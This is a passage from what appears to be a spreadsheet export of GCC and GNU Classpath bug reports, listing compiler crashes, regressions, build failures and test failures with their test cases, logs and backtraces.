with the G++ compiler version 4.5 snapshot 20090618.
The compiler said
endianness.c: In function 'swap64':
endianness.c:72:9: error: invalid conversion in gimple call
int64_t
D.6469_22 = __builtin_bswap64 (n_1(D))
endianness.c:72:9: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-19809</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Multiple definitions of friend functions in template classes</t>
  </si>
  <si>
    <t>This report is based on 
given this testcase:
#include 
template
struct n{
  friend void foo(){
    std::cerr &lt;&lt; i &lt;&lt; std::endl
  }
}
int main(){
  n n1
  n n2
  n n3
  foo()
}
there must be a bug here though I'm not sure what exactly it is.
a) it could be a multiple definition of foo which is reported by version 3.3.4
but not by 4.0.0 and 3.4.3.
b) std note 14.5.3.3 could mean that it's not a multiple definition:
&lt;&lt;&lt;3 When a function is defined in a friend function declaration in a class
template the function is defined when the class template is first instantiated.
The function is defined even if it is never used.&gt;&gt;&gt;
so if it's _only_ defined on the first instantiation this is not a multiple
definition - but then I don't think it is legal to use the template arguments of
struct n in the function definition
c) even if b) is wrong and usage of template arguments is allowed there's still
a bug because the result of the testcase above is 3 so the _last_
instantiation is used.
comeau C++ chooses a) so does 3.3.4.</t>
  </si>
  <si>
    <t>GCC-4857</t>
  </si>
  <si>
    <t>GNATS followup messages that were not filed</t>
  </si>
  <si>
    <t>Between 2001/06/02 18:29:51 UTC (when gnatsweb-2.8.0 was first
imported into GCC CVS revision 1.30) and 2001/11/12 15:48:07 UTC
(when I fixed the problem revision 1.42) PR status change messages
generated by gnatsweb did not include gcc-gnats in their recipients.
This meant that replies to those messages did not go to gcc-gnats and
some PRs may have been wrongly closed for lack of feedback.
For every message to gcc-bugs between those dates that included a PR
number in its Subject line was not an initial PR submission and did
not include gcc-gnats in its destination addresses either the message
or its URL in the web list archives should be sent to the PR to remedy
this.  Also every such closed PR needs to be considered individually
to determine whether given the unfiled feedback it should not have
been closed in particular any wrongly closed for lack of feedback
must be re-opened.
Release:
3.1 20011111 (experimental)
Environment:
System: Linux digraph 2.2.20 #2 Sat Nov 10 16:44:22 UTC 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-cvs/configure --prefix=/opt/gcc/mainline --disable-shared --enable-threads=posix --with-system-zlib
How-To-Repeat:
Look at such a PR and find missing feedback sent by an ordinary user
who didn't know that they needed to add gcc-gnats to the addresses
they sent their mail to.</t>
  </si>
  <si>
    <t>GCC-82595</t>
  </si>
  <si>
    <t>bootstrap fails in libsanitizer on powerpc64-unknown-linux-gnu</t>
  </si>
  <si>
    <t>Hi I recently got access to the gcc compile farm so I logged into gcc110 and tried bootstrapping gcc but it failed in libsanitizer with:
/bin/sh ../libtool --tag=CXX   --mode=link /home/egallager/gcc/build/./gcc/xgcc -shared-libgcc -B/home/egallager/gcc/build/./gcc -nostdinc++ -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/src -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -B/usr/local/powerpc64-unknown-linux-gnu/bin/ -B/usr/local/powerpc64-unknown-linux-gnu/lib/ -isystem /usr/local/powerpc64-unknown-linux-gnu/include -isystem /usr/local/powerpc64-unknown-linux-gnu/sys-include    -Wall -W -Wno-unused-parameter -Wwrite-strings -pedantic -Wno-long-long -fPIC -fno-builtin -fno-exceptions -fno-rtti -fomit-frame-pointer -funwind-tables -fvisibility=hidden -Wno-variadic-macros -I../../libstdc++-v3/include     -I../../libstdc++-v3/include/powerpc64-unknown-linux-gnu     -I../../../../libsanitizer/../libstdc++-v3/libsupc++ -std=gnu++11 -g -O2 -D_GNU_SOURCE -g -Os -version-info `grep -v '^#' ../../../../libsanitizer/lsan/libtool-version` -ldl -lrt -lpthread -lm  -o liblsan.la -rpath /usr/local/lib/../lib64 lsan_common.lo lsan_common_linux.lo lsan.lo lsan_allocator.lo lsan_interceptors.lo lsan_preinit.lo lsan_thread.lo ../sanitizer_common/libsanitizer_common.la ../interception/libinterception.la ../libbacktrace/libsanitizer_libbacktrace.la ../../libstdc++-v3/src/libstdc++.la 
libtool: link:  /home/egallager/gcc/build/./gcc/xgcc -shared-libgcc -B/home/egallager/gcc/build/./gcc -nostdinc++ -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/src -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -B/usr/local/powerpc64-unknown-linux-gnu/bin/ -B/usr/local/powerpc64-unknown-linux-gnu/lib/ -isystem /usr/local/powerpc64-unknown-linux-gnu/include -isystem /usr/local/powerpc64-unknown-linux-gnu/sys-include     -fPIC -DPIC -shared -nostdlib /lib/../lib64/crti.o /home/egallager/gcc/build/./gcc/crtbeginS.o  .libs/lsan_common.o .libs/lsan_common_linux.o .libs/lsan.o .libs/lsan_allocator.o .libs/lsan_interceptors.o .libs/lsan_preinit.o .libs/lsan_thread.o  -Wl--whole-archive ../sanitizer_common/.libs/libsanitizer_common.a ../interception/.libs/libinterception.a ../libbacktrace/.libs/libsanitizer_libbacktrace.a -Wl--no-whole-archive  -Wl-rpath -Wl/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/src/.libs -Wl-rpath -Wl/usr/local/lib/../lib64 -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/src -L/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -ldl -lrt -lpthread ../../libstdc++-v3/src/.libs/libstdc++.so -lm -L/home/egallager/gcc/build/./gcc -L/lib/../lib64 -L/usr/lib/../lib64 -lc -lgcc_s /home/egallager/gcc/build/./gcc/crtendS.o /lib/../lib64/crtn.o    -Wl-soname -Wlliblsan.so.0 -o .libs/liblsan.so.0.0.0
/usr/bin/ld: .libs/lsan_preinit.o: .preinit_array section is not allowed in DSO
/usr/bin/ld: failed to set dynamic section sizes: Nonrepresentable section on output
collect2: error: ld returned 1 exit status
make[4]: *** [liblsan.la] Error 1
make[4]: Leaving directory `/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libsanitizer/lsan'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libsanitizer'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/home/egallager/gcc/build/powerpc64-unknown-linux-gnu/libsanitizer'
make[1]: *** [all-target-libsanitizer] Error 2
make[1]: Leaving directory `/home/egallager/gcc/build'
make: *** [all] Error 2
/usr/bin/ld --version says:
[egallager@gcc1-power7 build]$ /usr/bin/ld --version
GNU ld version 2.25.1-32.base.el7_4.1 
Copyright (C) 2014 Free Software Foundation Inc.
This program is free software you may redistribute it under the terms of
the GNU General Public License version 3 or (at your option) a later version.
This program has absolutely no warranty.
[egallager@gcc1-power7 build]$
Happened twice first with the following configure flags:
./configure --disable-werror --disable-werror-always --enable-languages=cc++ltoobjcobj-c++ --enable-stage1-checking=releasertl -C --with-system-libunwind --enable-secureplt --enable-frame-pointer --enable-debug --disable-host-shared --disable-default-pie --without-pic --enable-target-optspace --enable-libstdcxx-debug
and then with these configure flags:
../configure --disable-werror --disable-werror-always --enable-languages=cc++ltoobjcobj-c++ --enable-stage1-checking=releasertl -C --with-system-libunwind --enable-secureplt --enable-frame-pointer --enable-debug --disable-host-shared --disable-default-pie --without-pic --enable-target-optspace --enable-libstdcxx-debug --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-plugin --enable-initfini-array --disable-libgcj --enable-gnu-indirect-function --enable-secureplt --with-long-double-128 --with-cpu-32=power7 --with-tune-32=power7 --with-cpu-64=power7 --with-tune-64=power7
I'm building trunk as of r253820.</t>
  </si>
  <si>
    <t>GCC-12654</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Incorrect comparison code generated for Alpha</t>
  </si>
  <si>
    <t>No particular compiler options are needed.  Somebody hacking gcc these days
have some serious problems with understanding two's complement arithmetic...!
Test case:
foo (long x)
{
  if (x &gt;= 1024)
    abort ()
}
main ()
{
  foo (~((unsigned long) (~0L) &gt;&gt; 1))
  foo (~((unsigned long) (~0L) &gt;&gt; 1) + 10000)
  exit (0)
}</t>
  </si>
  <si>
    <t>GCC-843</t>
  </si>
  <si>
    <t>[ARM] g77 `Unrecognizable insn' from const_double with -fPIC</t>
  </si>
  <si>
    <t>(current HEAD as of Nov 11 arm-linux target attached file is test-case)
$ ./f771 -O2 -fPIC ~/zbknu.f
 zbknu_/home/pb/zbknu.f: In subroutine `zbknu':
/home/pb/zbknu.f:567: Unrecognizable insn:
(insn 291 5514 299 (set (reg/v:DF 90)
        (const_double:DF (mem/u/f:DF (symbol_ref/u:SI (*.LC3)) 0) 0 [0x0] 0 [0x0] [0])) -1 (nil)
    (expr_list:REG_EQUAL (const_double:DF (mem/u/f:DF (symbol_ref/u:SI (*.LC3)) 0) 0 [0x0] 0 [0x0] [0])
        (nil)))
Compiling without -fPIC is successful.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-15001</t>
  </si>
  <si>
    <t>[3.4 only] Using JNI with interpreter and interface methods yields SIGSEGV</t>
  </si>
  <si>
    <t>When using JNI to call an interpreted method who's jmethodID stems from an
interface the program receives a SIGSEGV. The signal handler in turn goes into
an endless unwind loop and the program appears to be hung.
The sample program uses JNI to instantiate the jvm obtains the interface and
implementation class instantiates the latter and tries to call a method on it.
First it uses a jmethodID obtained directly from the implementation class. That
succeeds. Then it uses the jmethodID it gets when obtaining the same method
from the implemented interface. That fails.
I know that sending a compressed tar file is against your policy but you do
need the .class files in order to reproduce this bug.</t>
  </si>
  <si>
    <t>GCC-39285</t>
  </si>
  <si>
    <t>[4.4 Regression] Missing debug info for enum members in C++</t>
  </si>
  <si>
    <t>GCC @144404 does not generate DW_AT_const_value for enum members in C++ mode (in C everything appears fine). This is a regression from 4.3.1.
Test case:
enum E { red = 1 green = 42 }
int main()
{
   E e = red
   return e
}
When above is compiled with gcc-4.3.1 readelf -w shows:
 : Abbrev Number: 3 (DW_TAG_enumerator)
       DW_AT_name        : red	
       DW_AT_const_value : 1	
 : Abbrev Number: 4 (DW_TAG_enumerator)
       DW_AT_name        : (indirect string offset: 0x8): green	
       DW_AT_const_value : 42	
 : Abbrev Number: 5 (DW_TAG_subprogram)
...
When compiled with gcc-4.4.0:
 : Abbrev Number: 3 (DW_TAG_enumerator)
       DW_AT_name        : red	
 : Abbrev Number: 4 (DW_TAG_enumerator)
       DW_AT_name        : (indirect string offset: 0x8): green	
 : Abbrev Number: 5 (DW_TAG_subprogram)
...
AFAICT this is causing the following GDB tests to fail:
FAIL: gdb.cp/classes.exp: print obj_with_enum (2)
FAIL: gdb.cp/classes.exp: print obj_with_enum.priv_enum
FAIL: gdb.cp/classes.exp: ptype obj_with_enum.priv_enum
FAIL: gdb.cp/classes.exp: print ('ClassWithEnum::PrivEnum') 42
FAIL: gdb.cp/m-data.exp: simple object enum
FAIL: gdb.cp/m-data.exp: derived template object derived enum
FAIL: gdb.cp/m-data.exp: template object derived enum
FAIL: gdb.cp/m-static.exp: derived template object static enum
FAIL: gdb.cp/m-static.exp: template object static derived enum</t>
  </si>
  <si>
    <t>GCC-48588</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE (segfault) in gfc_get_nodesc_array_type</t>
  </si>
  <si>
    <t>Created attachment 23971
source code
Compiling a fortran library compiled many other times with other compilers including gfortran 4.4.
Here is the command and output. For some reason I can't produce the preprocessed file
C:\Documents and Settings\legarra\Mes documents\gs3\zipable\software&gt;gfortran -v -save-temps  -c ALliba
ll.f90
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=c:/program files/gfortran/bin/../libexec/gcc/i586-pc-mingw32/4.6.0/lto-wrapper.exe
Target: i586-pc-mingw32
Configured with: ../gcc-trunk/configure --prefix=/mingw --enable-languages=cfortran --with-gmp=/home/b
rad/gfortran/dependencies --disable-werror --enable-threads --disable-nls --build=i586-pc-mingw32 --ena
ble-libgomp --enable-shared --disable-win32-registry --with-dwarf2 --disable-sjlj-exceptions --enable-l
to
Thread model: win32
gcc version 4.6.0 20110214 (experimental) [trunk revision 170140] (GCC)
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-mtune=pentium' '-march=pentium'
 c:/program files/gfortran/bin/../libexec/gcc/i586-pc-mingw32/4.6.0/f951.exe ALliball.f90 -quiet -dumpb
ase ALliball.f90 -mtune=pentium -march=pentium -auxbase ALliball -version -fintrinsic-modules-path c:/p
rogram files/gfortran/bin/../lib/gcc/i586-pc-mingw32/4.6.0/finclude -o ALliball.s
GNU Fortran (GCC) version 4.6.0 20110214 (experimental) [trunk revision 170140] (i586-pc-mingw32)
        compiled by GNU C version 4.6.0 20110214 (experimental) [trunk revision 170140] GMP version 4.
3.2 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU Fortran (GCC) version 4.6.0 20110214 (experimental) [trunk revision 170140] (i586-pc-mingw32)
        compiled by GNU C version 4.6.0 20110214 (experimental) [trunk revision 170140] GMP version 4.
3.2 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ALliball.f90:9521:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>legarra</t>
  </si>
  <si>
    <t>GCC-64683</t>
  </si>
  <si>
    <t>FAIL: runtime/pprof -- testing.go:278: The entry did not match</t>
  </si>
  <si>
    <t>--- FAIL: TestMemoryProfiler (0.67s)
        testing.go:278: The entry did not match:
                0: 0 \[1: 2097152\] @ 0x[0-9a-f x]+
                #       0x[0-9a-f]+    pprof_test\.allocateTransient2M\+0x[0-9a-f]+   .*/mprof_test.go:30
                #       0x[0-9a-f]+    runtime_pprof_test\.TestMemoryProfiler\+0x[0-9a-f]+    .*/mprof_test.go:65</t>
  </si>
  <si>
    <t>CLASSPATH-28135</t>
  </si>
  <si>
    <t>JScrollPane.propertyChange  needs to be implemented</t>
  </si>
  <si>
    <t>Another Swing buglet: JScrollPane has two stub methods namely
propertyChange() and stateChanged().
For better readability I prefer a small border around my JTextAreas when
embedded into a JScrollPane like such:
    ta = new JTextArea( n_rows n_cols )
    ta.setEditable( false )
    JScrollPane scroller = new JScrollPane( ta )
    scroller.setVerticalScrollBarPolicy(JScrollPane.VERTICAL_SCROLLBAR_ALWAYS)
    scroller.setViewportBorder( new EmptyBorder(5555) )
But the border doesn't show up in classpath. If my analysis is correct
setViewportBorder() correctly generates a firePropertyChange() which finally 
calls back to propertyChanged() - which is currently empty.</t>
  </si>
  <si>
    <t>GCC-36424</t>
  </si>
  <si>
    <t>avr-gcc use don't saved registers in ISR with -O3 ('-frename-registers' ) optimization</t>
  </si>
  <si>
    <t>Testcase:
#include 
#include 
volatile unsigned char   UART_RxChar
volatile unsigned char   UART_ReceivedChar
SIGNAL(SIG_USART_RECV)      
{
    /* Indicate that the UART has received a character */
    UART_ReceivedChar = 1
    /* Store received character */
    UART_RxChar = UDR
}
Request: use -frename-registers optimization enabled on -O3.
Result code:
.global __vector_13
 .type __vector_13 @function
__vector_13:
.LFB2:
.LM1:
 push __zero_reg__
 push r0
 in r0__SREG__
 push r0
 clr __zero_reg__
 push r24
/* prologue: Signal */
/* frame size = 0 */
.LM2:
 ldi r26lo8(1)
 sts UART_ReceivedCharr26
.LM3:
 lds r24198
 sts UART_RxCharr24
/* epilogue start */
.LM4:
 pop r24
 pop r0
 out __SREG__r0
 pop r0
 pop __zero_reg__
 reti
R26 register used in ISR but don't saved/restored.
To fix bug need define HARD_REGNO_RENAME_OK macro in config/avr.h
Anatoly.</t>
  </si>
  <si>
    <t>aesok</t>
  </si>
  <si>
    <t>GCC-41862</t>
  </si>
  <si>
    <t>[4.5 Regression] -fgcse-sm causes bootstrap-debug comparison failures</t>
  </si>
  <si>
    <t>4.5.0 r153685 
Command line:
$ valgrind --track-origins=yes -v /mnt/svn/gcc-trunk/binary-153685-lto/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/cc1 -fpreprocessed testcase.i -m32 -O1 -version -fgcse-sm -o tmp.o
...
GNU C (GCC) version 4.5.0 20091028 (experimental) (x86_64-unknown-linux-gnu)                                                                                                                     
        compiled by GNU C version 4.5.0 20091028 (experimental) GMP version 4.3.1 MPFR version 2.4.1-p5 MPC version 0.7 
...
==5211== 43 errors in context 1 of 2:                                                                                                                                                               
==5211== Conditional jump or move depends on uninitialised value(s)                                                                                                                                 
==5211==    at 0x7B2215: store_killed_after (store-motion.c:270)                                                                                                                                    
==5211==    by 0x7B3221: execute_rtl_store_motion (store-motion.c:1084)                                                                                                                             
==5211==    by 0x71349C: execute_one_pass (passes.c:1519)                                                                                                                                           
==5211==    by 0x7136C4: execute_pass_list (passes.c:1568)                                                                                                                                          
==5211==    by 0x7136D6: execute_pass_list (passes.c:1569)                                                                                                                                          
==5211==    by 0x80B8B0: tree_rest_of_compilation (tree-optimize.c:392)                                                                                                                             
==5211==    by 0x9836AB: cgraph_expand_function (cgraphunit.c:1160)                                                                                                                                 
==5211==    by 0x985524: cgraph_optimize (cgraphunit.c:1219)                                                                                                                                        
==5211==    by 0x985A5E: cgraph_finalize_compilation_unit (cgraphunit.c:1089)                                                                                                                       
==5211==    by 0x4AE2DA: c_write_global_declarations (c-decl.c:9489)                                                                                                                                
==5211==    by 0x7B8CAB: toplev_main (toplev.c:1061)                                                                                                                                                
==5211==    by 0x6587A25: (below main) (in /lib64/libc-2.10.1.so)                                                                                                                                   
==5211==  Uninitialised value was created by a heap allocation                                                                                                                                      
==5211==    at 0x4C270AC: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)                                                                                                         
==5211==    by 0xC90C27: xmalloc (xmalloc.c:147)                                                                                                                                                    
==5211==    by 0x7B30CB: execute_rtl_store_motion (store-motion.c:1066)                                                                                                                             
==5211==    by 0x71349C: execute_one_pass (passes.c:1519)                                                                                                                                           
==5211==    by 0x7136C4: execute_pass_list (passes.c:1568)                                                                                                                                          
==5211==    by 0x7136D6: execute_pass_list (passes.c:1569)                                                                                                                                          
==5211==    by 0x80B8B0: tree_rest_of_compilation (tree-optimize.c:392)                                                                                                                             
==5211==    by 0x9836AB: cgraph_expand_function (cgraphunit.c:1160)                                                                                                                                 
==5211==    by 0x985524: cgraph_optimize (cgraphunit.c:1219)                                                                                                                                        
==5211==    by 0x985A5E: cgraph_finalize_compilation_unit (cgraphunit.c:1089)                                                                                                                       
==5211==    by 0x4AE2DA: c_write_global_declarations (c-decl.c:9489)                                                                                                                                
==5211==    by 0x7B8CAB: toplev_main (toplev.c:1061)                                                                                                                                                
==5211==                                                                                                                                                                                            
==5211==                                                                                                                                                                                            
==5211== 2273 errors in context 2 of 2:                                                                                                                                                             
==5211== Conditional jump or move depends on uninitialised value(s)                                                                                                                                 
==5211==    at 0x7B21FD: store_killed_after (store-motion.c:270)                                                                                                                                    
==5211==    by 0x7B3221: execute_rtl_store_motion (store-motion.c:1084)                                                                                                                             
==5211==    by 0x71349C: execute_one_pass (passes.c:1519)                                                                                                                                           
==5211==    by 0x7136C4: execute_pass_list (passes.c:1568)                                                                                                                                          
==5211==    by 0x7136D6: execute_pass_list (passes.c:1569)                                                                                                                                          
==5211==    by 0x80B8B0: tree_rest_of_compilation (tree-optimize.c:392)                                                                                                                             
==5211==    by 0x9836AB: cgraph_expand_function (cgraphunit.c:1160)                                                                                                                                 
==5211==    by 0x985524: cgraph_optimize (cgraphunit.c:1219)                                                                                                                                        
==5211==    by 0x985A5E: cgraph_finalize_compilation_unit (cgraphunit.c:1089)                                                                                                                       
==5211==    by 0x4AE2DA: c_write_global_declarations (c-decl.c:9489)                                                                                                                                
==5211==    by 0x7B8CAB: toplev_main (toplev.c:1061)                                                                                                                                                
==5211==    by 0x6587A25: (below main) (in /lib64/libc-2.10.1.so)                                                                                                                                   
==5211==  Uninitialised value was created by a heap allocation                                                                                                                                      
==5211==    at 0x4C270AC: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)                                                                                                         
==5211==    by 0xC90C27: xmalloc (xmalloc.c:147)                                                                                                                                                    
==5211==    by 0x7B30CB: execute_rtl_store_motion (store-motion.c:1066)                                                                                                                             
==5211==    by 0x71349C: execute_one_pass (passes.c:1519)                                                                                                                                           
==5211==    by 0x7136C4: execute_pass_list (passes.c:1568)                                                                                                                                          
==5211==    by 0x7136D6: execute_pass_list (passes.c:1569)                                                                                                                                          
==5211==    by 0x80B8B0: tree_rest_of_compilation (tree-optimize.c:392)                                                                                                                             
==5211==    by 0x9836AB: cgraph_expand_function (cgraphunit.c:1160)                                                                                                                                 
==5211==    by 0x985524: cgraph_optimize (cgraphunit.c:1219)                                                                                                                                        
==5211==    by 0x985A5E: cgraph_finalize_compilation_unit (cgraphunit.c:1089)                                                                                                                       
==5211==    by 0x4AE2DA: c_write_global_declarations (c-decl.c:9489)                                                                                                                                
==5211==    by 0x7B8CAB: toplev_main (toplev.c:1061)</t>
  </si>
  <si>
    <t>GCC-66129</t>
  </si>
  <si>
    <t>[6 Regression] FAIL: gcc.dg/vect/vect-strided-*c execution test</t>
  </si>
  <si>
    <t>On x86 r223059 caused:
FAIL: gcc.dg/vect/vect-strided-a-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-mult.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i2.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-i4.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u16-mult.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-a-u32-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-a-u32-mult.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-mult.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-mult-char-ls.c execution test
FAIL: gcc.dg/vect/vect-strided-mult-char-ls.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-u16-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-u16-i2.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-u16-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-u16-i4.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-u32-i4.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-i4.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-u32-i8.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-i8.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-u32-mult.c execution test
FAIL: gcc.dg/vect/vect-strided-u32-mult.c -flto -ffat-lto-objects execution test
FAIL: gcc.dg/vect/vect-strided-u8-i2.c execution test
FAIL: gcc.dg/vect/vect-strided-u8-i2.c -flto -ffat-lto-objects execution test
with
make check-gcc RUNTESTFLAGS=vect.exp=vect-strided*.c --target_board='unix{-march=corei7}'</t>
  </si>
  <si>
    <t>GCC-60736</t>
  </si>
  <si>
    <t>[4.9 Regression] Crash in preprocessor including stdc-predef.h when it does not exist on glibc-based systems</t>
  </si>
  <si>
    <t>The file stdc-predef.h is special on glibc-based systems as GCC pretends that it does a #include of that file first.  My system (Ubuntu Precise) does not have stdc-predef.h.  That case is supposed to work.  However if the program attempts to #include  which should fail the compiler crashes rather than reporting an error.
In other words on a system without  this crashes:
echo #include  | gcc -x c -
:1:0: internal compiler error: Segmentation fault
0x9ad9cf crash_signal
	../../gccgo3/gcc/toplev.c:336
0xf35ba6 cpp_errno(cpp_reader* int char const*)
	../../gccgo3/libcpp/errors.c:233
0xf3af13 _cpp_find_file
	../../gccgo3/libcpp/files.c:571
0xf3b621 _cpp_stack_include
	../../gccgo3/libcpp/files.c:993
0xf32b20 do_include_common
	../../gccgo3/libcpp/directives.c:793
0xf336c0 _cpp_handle_directive
	../../gccgo3/libcpp/directives.c:492
0xf40ad4 _cpp_lex_token
	../../gccgo3/libcpp/lex.c:2067
0xf45887 cpp_get_token_1
	../../gccgo3/libcpp/macro.c:2362
0x5ee37a c_lex_with_flags(tree_node** unsigned int* unsigned char* int)
	../../gccgo3/gcc/c-family/c-lex.c:302
0x584a93 c_lex_one_token
	../../gccgo3/gcc/c/c-parser.c:228
0x5a389d c_parser_peek_token
	../../gccgo3/gcc/c/c-parser.c:408
0x5a389d c_parse_file()
	../../gccgo3/gcc/c/c-parser.c:13809
0x5f6894 c_common_parse_file()
	../../gccgo3/gcc/c-family/c-opts.c:1056
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>CLASSPATH-28391</t>
  </si>
  <si>
    <t>gkeytool -list creates keystore file</t>
  </si>
  <si>
    <t>If you run
  gkeytool -list -keystore foo
...where 'foo' is a nonexistent file a new empty keystore will be created in the file 'foo' instead of printing an error that the file doesn't exist. This is undesirable behavior (-list *should* be a read-only operation but it's modifying the system).</t>
  </si>
  <si>
    <t>GCC-9729</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE in mangle_conv_op_name_for_type at cp/mangle.c:2612</t>
  </si>
  <si>
    <t>Compiling the preprocessed attached file gives :
In file included from /home/spion/CGAL-2.5-I-69/include/CGAL/Triangulation_2.h:50
                 from test_triangulation_2.C:33:
/home/spion/CGAL-2.5-I-69/include/CGAL/Triangulation_line_face_circulator_2.h:101: internal compiler error: in
   mangle_conv_op_name_for_type at cp/mangle.c:2612
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is the message produced by current 3.3.
3.4 also produces a similar message but it needs another
preprocessed file (I can provide it on demand).
3.2.2 works fine.
Release:
3.3 and 3.4
Environment:
Reading specs from /home/spion/GCC/Linux-3.3/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ../gcc-3.3/configure --prefix=/home/spion/GCC/Linux-3.3 --enable-languages=c++ --with-as=/home/spion/BINUTILS/Linux-2.13/bin/as --with-ld=/home/spion/BINUTILS/Linux-2.13/bin/ld
Thread model: posix
gcc version 3.3 20030217 (prerelease)
How-To-Repeat:
g++ -c test_triangulation_2.ii</t>
  </si>
  <si>
    <t>sylvain.pion</t>
  </si>
  <si>
    <t>GCC-33210</t>
  </si>
  <si>
    <t>[4.1 Regression] Broken diagnostics: 'bound_template_template_parm' not supported by pp_cxx_unqualified_id/dump_decl</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers a broken diagnostic since GCC 3.4.2:
======================================================================
template struct A
template class B&gt; A::x&gt; operator() ()
======================================================================
bug.cc:3: error: `A operator()()' must be a nonstatic member function
A similar error message is generated by the following code snippet since
GCC 3.4.0:
======================================================================
template class T&gt; void foo(int T::x)
======================================================================
bug.cc:1: error: `#`bound_template_template_parm' not supported by dump_decl#::x' is not a type
bug.cc:1: error: ISO C++ forbids declaration of `parameter' with no type</t>
  </si>
  <si>
    <t>GCC-36688</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] Incorrect struct assignments with nested const initializers</t>
  </si>
  <si>
    <t>g++ 4.3 and higher produces incorrect struct assignments with nested
constant initializers. In the example the assignment x = init_x
initializes the struct with zero's not with {{123}0}.
gcc versions:
  gcc 4.3.2 (svn 2008/07/01 rev. 137317)
  gcc 4.4.0 (svn 2008/06/24)
  gcc 3.3.3 and gcc 4.1.2 (SuSE) are running fine.
systems:
  x86_64 ia64 (probably platform independent)
command line:
  g++ -O0 t.c  (occurs with and without optimizations)
preprocessed file:
typedef long unsigned int size_t
extern C int memcmp (__const void *__s1 __const void *__s2 size_t __n)
     throw () __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1 2)))
typedef struct
{
  long long a
  long long b
  long long c
} t_bar
typedef struct
{
  t_bar g
  long long free[12]
}
t_foo
static const t_bar init_y = {123}
static const t_foo init_x = {init_y0}
int main ()
{
  t_foo x = init_x
  return memcmp (
}</t>
  </si>
  <si>
    <t>GCC-67457</t>
  </si>
  <si>
    <t>segfault in libbacktrace</t>
  </si>
  <si>
    <t>gfortran on trunk uses libbacktrace to print backtraces on error. In an out-of-memory situation libbacktrace will fail to print a backtrace and segfault instead. While having something like a backtrace would be nice (and other compilers seem to manage) I guess that's difficult. For the segfault gdb print this:
Starting program: /data/vjoost/gnu/bugs/a.out 
Operating system error: Cannot allocate memory
Allocation would exceed memory limit
Error termination. Backtrace:
Could not print backtrace: mmap: Cannot allocate memory
Could not print backtrace: mmap: Cannot allocate memory
Could not print backtrace: mmap: Cannot allocate memory
Program received signal SIGSEGV Segmentation fault.
backtrace_free_locked (state=0x7ffff7ecc000 size=3912 addr=0x20b7) at ../../../gcc/libbacktrace/mmap.c:75
